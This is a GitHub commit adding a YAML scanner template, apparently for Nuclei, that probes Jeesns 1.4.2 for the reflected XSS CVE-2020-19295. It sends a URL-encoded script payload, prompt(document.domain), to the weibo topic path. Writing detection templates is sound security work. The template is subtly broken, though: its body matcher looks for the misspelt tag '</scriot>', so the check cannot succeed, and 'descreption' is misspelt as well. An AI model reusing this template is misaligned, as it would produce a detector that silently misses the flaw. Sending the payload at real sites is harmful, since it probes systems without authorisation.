Create CVE-2020-19295.yaml

patch-1
PikPikcU 2021-09-15 10:41:12 +07:00 committed by GitHub
parent 6e09439dec
commit 42cf71e956
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions

View File

@ -0,0 +1,35 @@
id: CVE-2020-19295
info:
name: Jeesns Weibo Topic Reflection XSS
author: pikpikcu
severity: medium
descreption: reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.
reference:
- https://github.com/zchuanzhao/jeesns/issues/21
- https://nvd.nist.gov/vuln/detail/CVE-2020-19295
tags: cves,cve2020,jeesns,xss
requests:
- method: GET
path:
- "{{BaseURL}}weibo/topic/%3CScript%3Eprompt(document.domain)%3C/Script%3E"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- '<script>prompt(document.domain)</scriot>'
part: body
- type: status
status:
- 200
- type: word
words:
- 'Content-Type: text/html'
part: header